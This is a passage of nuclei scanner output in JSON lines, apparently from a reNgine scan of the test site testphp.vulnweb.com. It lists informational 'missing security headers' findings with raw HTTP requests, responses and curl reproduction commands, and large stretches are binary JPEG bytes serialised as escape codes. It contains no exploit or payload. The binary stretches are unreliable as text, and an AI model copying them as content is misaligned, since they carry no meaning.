d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:45.427299769Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:46.239141103Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ 